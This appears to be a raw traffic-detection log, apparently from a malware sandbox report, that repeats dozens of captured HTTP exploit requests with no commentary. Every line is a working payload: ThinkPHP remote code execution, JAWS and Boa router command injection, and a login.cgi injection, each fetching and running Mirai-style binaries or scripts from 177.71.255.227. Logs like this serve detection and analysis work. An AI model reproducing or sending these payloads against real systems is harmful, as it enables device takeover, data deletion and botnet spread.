Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflate |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
